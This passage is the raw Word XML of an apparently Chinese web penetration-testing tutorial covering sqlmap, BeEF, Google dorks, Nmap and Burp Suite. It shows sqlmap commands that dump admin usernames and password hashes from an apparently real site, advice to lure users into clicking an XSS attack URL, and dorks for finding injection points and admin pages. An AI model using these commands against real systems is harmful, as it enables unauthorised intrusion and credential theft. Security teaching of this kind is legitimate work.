                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="21812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结果得出，猜测到了5个table的名称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="38" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="016094"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>03</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第三步：猜测admin_user表的内容</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输入命令：sqlmap.py -u "http://www.xryj.com/pro_detail.asp?id=683" -T admin_user --columns</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3971925" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971925" cy="23050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结果显示，admin_user表中有admin, data, id, password字段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="38" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="016094"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>04</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第四步：猜测admin_user表中admin, password字段的内容</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输入命令：sqlmap.py -u "http://www.xryj.com/pro_detail.asp?id=683" -T admin_user -C "admin,password" --dump</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5981700" cy="4105275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5981700" cy="41052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结果得出用户名admin和密码，密码是md5加密显示的，下面解密密码为：</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3705225" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3705225" cy="21526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下面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>下使用sqlmap注入网站的简单步骤(Access数据库)</w:t>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第一步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>：猜测是否可以进行注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>命令：sqlmap.py –u "http://www.xxx.com/boli.asp?id=666”</w:t>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第二步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>：猜表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>命令：sqlmap.py –u "http://www.xxx.com/boli.asp?id=666” --tables</w:t>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第三步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>：根据猜测到的表名猜测表中的字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>命令：sqlmap.py –u "http://www.xxx.com/boli.asp?id=666” -T table_name -- columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>第四步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>：根据猜测的字段名称猜测表中的字段值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>命令：sqlmap.py -u "http://www.xryj.com/pro_detail.asp?id=683" -T table_name -C "fields_name,fields_name" –dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>SQL Map参数有很多，大家掌握常用的命令参数即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BeEF实战</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BeEF是一个很强大的XSS演示平台，BeEF有一个控制后台，攻击者可以在后台控制前端的一切。</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假如“http://www.xxx/abc.php?id=1”存在xss攻击漏洞，则可以构造攻击URL为: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http://www.xxx/abc.php?id=”，把构造好的攻击URL通过邮箱、qq或者论坛等途径发送给用户，诱导用户点击，则BeEF服务端即可显示访问用户的信息。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7667625" cy="4848225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>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34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7667625" cy="48482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Commands模块下，有更多的操作可以cookie、用户提交的数据、乃至操作用户浏览器等。</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7639050" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7639050" cy="41243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BeEF功能很强大，感兴趣的可以深入的研究，本示例一是说明该工具的功能之强大，也是说明一旦存在XSS漏洞被攻击者利用，后果的严重性大家可想而知。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1 Google hack常用语法</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intitle：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>搜索网页标题中包含有特定字符的网页。例如输入“intitle: cbi”，这样网页标题中带有cbi的网页都会被搜索出来。</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inurl：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>搜索包含有特定字符的URL。例如输入“inurl:cbi”，则可以找到带有cbi字符的URL。</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intext:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>搜索网页正文内容中的指定字符，例如输入“intext:cbi”、"intext:管理后台"。这个语法类似我们平时在某些网站中使用的“文章内容搜索”功能。</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Filetype:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>搜索指定类型的文件。例如输入“filetype:cbi”，将返回所有以cbi结尾的文件URL。当我们在查询里边包含filetype:扩展名的时候，Google会限制查询结果仅返回特定文件类型的网页。例[资产评估 filetype:pdf]，这个查询将会返回所有文件类型为pdf的资产评估信息。其它可用的特定文件类型格式查询还有doc ,txt,ppt,xls.rtf,swf,ps等。</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Site：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>找到与指定网站有联系的URL。例如输入“Site：imshixu.com”。所有和这个网站有联系的URL都会被显示。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filetype:txt 查找TXT文件 其他的依次内推</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intext:管理</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inurl:login</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intitle:后台</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查看服务器使用的程序</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filetype:asp</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filetype:php</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查看上传漏洞：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inurl:file</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inurl:load</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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>查找注射点：</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site:xx.com filetype:asp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>site:asp?id= Index of：利用”Index of”语法检索出站点的活动索引目录 Index 就是主页服务器所进行操作的一个索引目录。 黑客们常利用目录获取密码文件和其他安全文件。常用的攻击语法如下： Index of /admin 可以挖掘到安全意识不强的管理员的机密文件： 黑客往往可以快速地提取他所要的信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2 Nmap端口扫描</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Nmap是一个开源的网络连接段扫描软件，用来扫描计算机开放的网络连接端，确定哪些服务在哪些连接端，并且推断计算机运行哪个操作系统。</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Nmap常用扫描参数及说明</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7829550" cy="7086600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45"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56"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7829550" cy="70866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扫描制定IP所开放端口</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输入命令：nmap –sS –p 1-65535 –v 192.168.1.106，表示半开扫描，指定端口为1到65535，并且显示扫描过程。</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7600950" cy="4105275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="46"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257"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7600950" cy="41052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扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t> C段存活主机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命令：nmap –sP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com/24</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扫描指定端口</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命令：nmap -80,1433,22,1/P521 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com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7477125" cy="5391150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="47"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258"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7477125" cy="5391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探测主机操作系统（存在误报）</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命令：nmap –o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com</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7810500" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="48" name="图片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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7810500" cy="11334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全面的系统探测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命令：nmap –v –A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com</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穿透防火墙进行扫描</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命令：nmap –Pn –A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0080FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxx.com</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Nmap所提供的命令非常丰富，也非常灵活，只需要几个参数即可进行快速扫描。学习Nmap最重要的是掌握参数的含义，每个参数都有不同的用法，只有掌握了这些参数的用法，才能更好地发挥Nmap强大的功能。这些参数不需要完全掌握，只需掌握常用参数即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite 实例演示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Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。</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Burp Suite首页面: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5743575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="54"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9" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="57435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Burp Suite是按照功能模块划分，主要模块功能简述如下:</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1.Target(目标)——显示目标目录结构的的一个功能</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2.Proxy(代理)——拦截 HTTP/S 的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。 </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3.Spider(蜘蛛)——应用智能感应的网络爬虫，它能完整的枚举应用程序的内容和功能。</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4.Scanner(扫器)——高级工具，执行后，它能自动地发现 web 应用程序的安全漏洞。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5.Intruder(入侵)——一个定制的高度可配置的工具，对 web 应用程序进行自动化攻击，如:枚举标识符，收集有用的数据，以及使用 fuzzing 技术探测常规漏洞。 </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6.Repeater(中继器)——一个靠手动操作来触发单独的 HTTP 请求，并分析应用程序响应的工具。</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7.Sequencer(会话)——用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。 </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8.Decoder(解码器)——进行手动执行或对应用程序数据者智能解码编码的工具。 9.Comparer(对比)——通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。</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10.Extender(扩展)——可以让你加载Burp Suite的扩展，使用你自己的或第三方代码来扩展 Burp Suit 的功能。</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11.Options(设置)——对 Burp Suite 的一些设置</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下面简述下使用 Burp Suite 的流程: 第一步:设置代理</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在 proxy 模块设置代理，然后在浏览器设置好代理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4638675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="55"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0" descr="IMG_257"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="46386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6915150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52"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descr="IMG_258"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="6915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第二步:在浏览器中访问要测试的程序</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6534150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49"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descr="IMG_259"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="65341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 登录后简单浏览几个页面即可，此时 Burp Suite 已经记录了我们的记录:</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5838825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53"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260"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="583882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然后发送到 Spider 模块爬行站点，Burp Suite 会自动的爬行该站点下的目录及文 件信息，然后发送到Scanner模块扫 该站点。在Scanner模块下的Scan queue 子模块下可以看到扫 的进度信息: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5791200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="图片 5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4" descr="IMG_261"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
